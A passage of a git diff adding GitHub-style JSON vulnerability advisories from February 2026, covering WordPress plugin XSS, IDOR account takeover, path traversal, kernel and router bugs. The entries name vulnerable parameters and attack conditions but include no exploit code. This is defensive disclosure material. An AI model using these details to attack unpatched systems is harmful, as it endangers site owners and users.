details like email. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15096" + }, + { + "type": "WEB", + "url": "https://themeforest.net/item/videospire-video-streaming-ott-platform-wordpress-theme/39243225?s_rank=1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bf152269-73e1-473f-8d97-ce94e9b885d0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T10:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x35p-8cmq-xf5p/GHSA-x35p-8cmq-xf5p.json b/advisories/unreviewed/2026/02/GHSA-x35p-8cmq-xf5p/GHSA-x35p-8cmq-xf5p.json new file mode 100644 index 0000000000000..cd3a21d75d78f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x35p-8cmq-xf5p/GHSA-x35p-8cmq-xf5p.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x35p-8cmq-xf5p", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-1910" + ], + "details": "The UpMenu – Online ordering for restaurants plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lang' attribute of the 'upmenu-menu' shortcode in all versions up to, and including, 3.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1910" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/upmenu/tags/3.1/upmenu.php#L720" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/upmenu/trunk/upmenu.php#L720" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bbb9483b-ee00-4e40-8fa3-eefbbfeb9516?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x38f-f365-5fgg/GHSA-x38f-f365-5fgg.json b/advisories/unreviewed/2026/02/GHSA-x38f-f365-5fgg/GHSA-x38f-f365-5fgg.json new file mode 100644 index 0000000000000..17d1a0a3493f2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x38f-f365-5fgg/GHSA-x38f-f365-5fgg.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x38f-f365-5fgg", + "modified": "2026-02-13T21:31:39Z", + "published": "2026-02-13T21:31:39Z", + "aliases": [ + "CVE-2025-36542" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36542" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x398-2rgf-67p8/GHSA-x398-2rgf-67p8.json b/advisories/unreviewed/2026/02/GHSA-x398-2rgf-67p8/GHSA-x398-2rgf-67p8.json new file mode 100644 index 0000000000000..bebb13d60a542 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x398-2rgf-67p8/GHSA-x398-2rgf-67p8.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x398-2rgf-67p8", + "modified": "2026-02-11T12:30:22Z", + "published": "2026-02-11T12:30:22Z", + "aliases": [ + "CVE-2026-1080" + ], + "details": "GitLab has remediated an issue in GitLab EE affecting all versions from 16.7 before 18.6.6, 18.7 before 18.7.4, and 18.8 before 18.8.4 that, under certain conditions could have allowed an authenticated user to access iteration data from private descendant groups by querying the iterations API endpoint.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1080" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/3484568" + }, + { + "type": "WEB", + "url": "https://about.gitlab.com/releases/2026/02/10/patch-release-gitlab-18-8-4-released" + }, + { + "type": "WEB", + "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/586477" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x39p-mhp8-fvfx/GHSA-x39p-mhp8-fvfx.json b/advisories/unreviewed/2026/02/GHSA-x39p-mhp8-fvfx/GHSA-x39p-mhp8-fvfx.json new file mode 100644 index 0000000000000..9b0e16b73de44 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x39p-mhp8-fvfx/GHSA-x39p-mhp8-fvfx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x39p-mhp8-fvfx", + "modified": "2026-02-17T06:31:25Z", + "published": "2026-02-17T06:31:25Z", + "aliases": [ + "CVE-2026-2002" + ], + "details": "The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form_name parameter in all versions up to, and including, 1.50.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The plugin allows admins to give form management permissions to lower level users, which could make this exploitable by users such as subscribers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2002" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3458187%40forminator%2Ftrunk&old=3443402%40forminator%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4ada2055-3c4a-4b6f-8803-2eac8ede5ec7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T05:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x3gh-q355-f5px/GHSA-x3gh-q355-f5px.json b/advisories/unreviewed/2026/02/GHSA-x3gh-q355-f5px/GHSA-x3gh-q355-f5px.json new file mode 100644 index 0000000000000..2897d659e4e6a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x3gh-q355-f5px/GHSA-x3gh-q355-f5px.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x3gh-q355-f5px", + "modified": "2026-02-14T18:30:16Z", + "published": "2026-02-14T18:30:16Z", + "aliases": [ + "CVE-2026-23191" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: aloop: Fix racy access at PCM trigger\n\nThe PCM trigger callback of aloop driver tries to check the PCM state\nand stop the stream of the tied substream in the corresponding cable.\nSince both check and stop operations are performed outside the cable\nlock, this may result in UAF when a program attempts to trigger\nfrequently while opening/closing the tied stream, as spotted by\nfuzzers.\n\nFor addressing the UAF, this patch changes two things:\n- It covers the most of code in loopback_check_format() with\n cable->lock spinlock, and add the proper NULL checks. This avoids\n already some racy accesses.\n- In addition, now we try to check the state of the capture PCM stream\n that may be stopped in this function, which was the major pain point\n leading to UAF.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23191" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5727ccf9d19ca414cb76d9b647883822e2789c2e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/826af7fa62e347464b1b4e0ba2fe19a92438084f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bad15420050db1803767e58756114800cce91ea4" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T17:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x3gw-vh56-pg6x/GHSA-x3gw-vh56-pg6x.json b/advisories/unreviewed/2026/02/GHSA-x3gw-vh56-pg6x/GHSA-x3gw-vh56-pg6x.json new file mode 100644 index 0000000000000..3fb3c0306470b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x3gw-vh56-pg6x/GHSA-x3gw-vh56-pg6x.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x3gw-vh56-pg6x", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-71246" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71246" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T16:27:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json b/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json new file mode 100644 index 0000000000000..2b316363e9d5b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x3j4-874w-h7pv", + "modified": "2026-02-13T21:31:35Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70121" + ], + "details": "An array index out of bounds vulnerability in the AMF component of free5GC v4.0.1 allows remote attackers to cause a denial of service via a crafted 5GS Mobile Identity in a NAS Registration Request message. The issue occurs in the GetSUCI method (NAS_MobileIdentity5GS.go) when accessing index 5 of a 5-element array, leading to a runtime panic and AMF crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70121" + }, + { + "type": "WEB", + "url": "https://github.com/free5gc/free5gc/issues/747" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x44w-4824-m48x/GHSA-x44w-4824-m48x.json b/advisories/unreviewed/2026/02/GHSA-x44w-4824-m48x/GHSA-x44w-4824-m48x.json new file mode 100644 index 0000000000000..e89d5cb4951c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x44w-4824-m48x/GHSA-x44w-4824-m48x.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x44w-4824-m48x", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-26359" + ], + "details": "Dell Unisphere for PowerMax, version(s) 10.2, contain(s) an External Control of File Name or Path vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to the ability to overwrite arbitrary files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26359" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000429268/dsa-2026-102-dell-unisphere-for-powermax-and-powermax-eem-security-update-for-multiple-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json b/advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json new file mode 100644 index 0000000000000..7abfd18bfc5da --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x4qx-g5c7-vgmf/GHSA-x4qx-g5c7-vgmf.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x4qx-g5c7-vgmf", + "modified": "2026-02-12T21:31:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54169" + ], + "details": "An out-of-bounds read vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to obtain secret data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5068 and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54169" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x4w3-c999-4989/GHSA-x4w3-c999-4989.json b/advisories/unreviewed/2026/02/GHSA-x4w3-c999-4989/GHSA-x4w3-c999-4989.json index 47a097c402638..782828929672c 100644 --- a/advisories/unreviewed/2026/02/GHSA-x4w3-c999-4989/GHSA-x4w3-c999-4989.json +++ b/advisories/unreviewed/2026/02/GHSA-x4w3-c999-4989/GHSA-x4w3-c999-4989.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-x4w3-c999-4989", - "modified": "2026-02-03T21:31:50Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:50Z", "aliases": [ "CVE-2025-59482" ], "details": "Heap-based Buffer Overflow vulnerability in TP-Link Archer AX53 v1.0 (tmpserver modules) allows authenticated adjacent attackers to cause a segmentation fault or potentially execute arbitrary code via a specially crafted network packet containing a field whose length exceeds the maximum expected value.This issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-x4xg-c2mg-399g/GHSA-x4xg-c2mg-399g.json b/advisories/unreviewed/2026/02/GHSA-x4xg-c2mg-399g/GHSA-x4xg-c2mg-399g.json new file mode 100644 index 0000000000000..5b070bbc55788 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x4xg-c2mg-399g/GHSA-x4xg-c2mg-399g.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x4xg-c2mg-399g", + "modified": "2026-02-11T06:30:40Z", + "published": "2026-02-11T06:30:40Z", + "aliases": [ + "CVE-2026-1893" + ], + "details": "The Orbisius Random Name Generator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'btn_label' parameter in the 'orbisius_random_name_generator' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1893" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/orbisius-random-name-generator/tags/1.0.2/orbisius-random-name-generator.php#L112" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3455340%40orbisius-random-name-generator&new=3455340%40orbisius-random-name-generator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/84e6bd88-88d1-4529-86f3-6c73fb47db9b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T05:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x522-cqqg-xqx7/GHSA-x522-cqqg-xqx7.json b/advisories/unreviewed/2026/02/GHSA-x522-cqqg-xqx7/GHSA-x522-cqqg-xqx7.json new file mode 100644 index 0000000000000..1d842c194f44a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x522-cqqg-xqx7/GHSA-x522-cqqg-xqx7.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x522-cqqg-xqx7", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25310" + ], + "details": "ActiveFax Server 6.92 Build 0316 contains an unquoted service path vulnerability in the ActiveFaxServiceNT service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with elevated administrative privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25310" + }, + { + "type": "WEB", + "url": "https://www.actfax.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47503" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/activefax-server-build-activefaxservicent-unquoted-service-path" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json b/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json new file mode 100644 index 0000000000000..e42c5f8bdd069 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x536-g6fc-g963/GHSA-x536-g6fc-g963.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x536-g6fc-g963", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-2464" + ], + "details": "Path traversal vulnerability in the AMR Printer Management 1.01 Beta web service, which allows remote attackers to read arbitrary files from the underlying Windows system by using specially crafted path traversal sequences in requests directed to the web management service. The service is accessible without authentication and runs with elevated privileges, amplifying the impact of the vulnerability. An attacker can exploit this condition to access sensitive and privileged files on the system using path traversal payloads. Successful exploitation of this vulnerability could lead to the unauthorized disclosure of internal system information, compromising the confidentiality of the affected environment.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2464" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/directory-traversal-amr-printer-management-amr" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json b/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json index 1fe637d52d188..b74910b439200 100644 --- a/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json +++ b/advisories/unreviewed/2026/02/GHSA-x566-frf2-p8rw/GHSA-x566-frf2-p8rw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-x566-frf2-p8rw", - "modified": "2026-02-09T12:30:22Z", + "modified": "2026-02-11T12:30:21Z", "published": "2026-02-09T12:30:22Z", "aliases": [ "CVE-2025-6830" diff --git a/advisories/unreviewed/2026/02/GHSA-x5m6-cw78-7xrw/GHSA-x5m6-cw78-7xrw.json b/advisories/unreviewed/2026/02/GHSA-x5m6-cw78-7xrw/GHSA-x5m6-cw78-7xrw.json new file mode 100644 index 0000000000000..364da0e598a82 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x5m6-cw78-7xrw/GHSA-x5m6-cw78-7xrw.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x5m6-cw78-7xrw", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-13048" + ], + "details": "The StatCounter – Free Real Time Visitor Stats plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user's Nickname in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13048" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/official-statcounter-plugin-for-wordpress/tags/2.1.1/StatCounter-Wordpress-Plugin.php#L274" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3407998%40official-statcounter-plugin-for-wordpress&new=3407998%40official-statcounter-plugin-for-wordpress&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bcde42fb-6f61-4174-a44a-bb28e4855062?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x5p5-6q7q-gj33/GHSA-x5p5-6q7q-gj33.json b/advisories/unreviewed/2026/02/GHSA-x5p5-6q7q-gj33/GHSA-x5p5-6q7q-gj33.json new file mode 100644 index 0000000000000..928a03f935495 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x5p5-6q7q-gj33/GHSA-x5p5-6q7q-gj33.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x5p5-6q7q-gj33", + "modified": "2026-02-14T15:32:18Z", + "published": "2026-02-14T15:32:18Z", + "aliases": [ + "CVE-2026-23123" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: debugfs: initialize src_node and dst_node to empty strings\n\nThe debugfs_create_str() API assumes that the string pointer is either NULL\nor points to valid kmalloc() memory. Leaving the pointer uninitialized can\ncause problems.\n\nInitialize src_node and dst_node to empty strings before creating the\ndebugfs entries to guarantee that reads and writes are safe.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23123" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5d7c7e1fb3ec24fdd0f9faa27b666d6789e891e8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8cc27f5c6dd17dd090f3a696683f04336c162ff5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/935d0938b570589c8b0a1733d2cba3c39d027f25" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aa79a5a959c7c414bd6fba01ea8dbaddd44f13e7" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T15:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x5rj-w9pr-xhrg/GHSA-x5rj-w9pr-xhrg.json b/advisories/unreviewed/2026/02/GHSA-x5rj-w9pr-xhrg/GHSA-x5rj-w9pr-xhrg.json new file mode 100644 index 0000000000000..6b4fc03b0e7f9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x5rj-w9pr-xhrg/GHSA-x5rj-w9pr-xhrg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x5rj-w9pr-xhrg", + "modified": "2026-02-12T15:32:47Z", + "published": "2026-02-12T15:32:47Z", + "aliases": [ + "CVE-2026-1316" + ], + "details": "The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'media[].href' parameter in all versions up to, and including, 5.97.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers (if 'Enable for Guests' is enabled) to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1316" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3446777/customer-reviews-woocommerce" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f8b34144-5516-46df-b093-95f4bf76b896?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T13:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json b/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json new file mode 100644 index 0000000000000..0a7a54aed1d6f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x648-6h35-89x6/GHSA-x648-6h35-89x6.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x648-6h35-89x6", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-25005" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in N-Media Frontend File Manager nmedia-user-file-uploader allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Frontend File Manager: from n/a through <= 23.5.", + "severity": [], + "affected": [], + 